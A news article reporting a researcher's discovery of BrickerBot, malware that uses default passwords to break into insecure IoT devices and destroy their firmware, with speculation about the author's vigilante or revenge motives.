Malware that bricks insecure IoT devices might be anti-botnet vigilante tool
A new variety of malicious software is capable of attacking and effectively destroying insecure connected Internet of Things devices, using the same security flaws exploited by the notorious Mirai botnet, a researcher says.
It’s not clear how many devices might have been damaged by the BrickerBot malware, Pascal Geenens, the researcher who discovered it, told CyberScoop. But the malware, which attacks the devices by trying to corrupt their firmware and flash memory, is at the very least a powerful proof-of-concept likely to inspire copycats.
Geenens, a cybersecurity evangelist for Radware, last month found two varieties of BrickerBot attacking his honeypot — a network of computers left on the internet as bait for hackers — but since the honeypot doesn’t contain any actual IoT devices, he couldn’t be sure exactly what the impact of the attack might be in real life.
Geenens speculated the author might be some kind of digital vigilante — aiming to alert the world to the ease with which IoT devices could be compromised, while simultaneously punishing both the users who installed them so carelessly and the manufacturers, who designed them without any security or any way to provide some.
“It could be a white-hat-turned-gray-hat,” he said.
Depending on the exact type of device and the way it was configured, he said, “The damage might be total, to stop the device from working at all, or it might be almost unnoticeable … It might be more or less permanent.”
Some kinds of damage could be cured with a reboot; other devices would be “bricked” — effectively destroyed or rendered useless.
“We are not aware of any user reports” about real damage from BrickerBot, he said, adding that webcams were the most likely kinds of devices to fall victim.
The dangers posed by the weaponization of insecure IoT connected devices were underlined last year by Mirai. The malware recruited such devices into huge botnets, and used their internet connections to deluge targeted sites with fake traffic, knocking them offline in a distributed denial of service, or DDoS attack.
Geenens added that BrickerBot could also be the work of a frustrated Mirai bot herder. “It could be a black-hat hacker, whose botnet lost out, looking for revenge [on former competitors] by … eradicating the problem.”
BrickerBot breaks in to devices the same way Mirai does, by scanning the internet looking for their connections and then trying a series of manufacturers’ default passwords. But once successfully connected, it does not install malware to propagate itself, as Mirai does.
Instead, it sends the compromised device a series of commands designed to cripple it, principally by destroying embedded flash memory or other firmware components.
The first version of BrickerBot last month was generated by a dozen or so internet routers, all of which were running outdated operating system firmware. “My presumption is that those devices had been compromised,” said Geenens.
After four days that attack stopped, having launched 1,800 separate attempts to destroy the fake devices in Geenens’ honeypot.
But the second BrickerBot, which had started within an hour of the first, continues to this day, he said. It is much slower, attacking only every two hours, and the source is hidden because the attacks are launched over the anonymizing Tor network — also known as the dark web.
Now that Geenens’ report on BrickerBot is getting such a lot of attention, he suggested that the author might try to come forward in some fashion, perhaps even anonymously, to enjoy some of the acclaim.
“A look of people [have expressed admiration on social media for] what he’s done, so he might come out … Or he might get scared [at all the attention he’s generating] and stop.”
Either way, said Geenens, “There will be copycats.”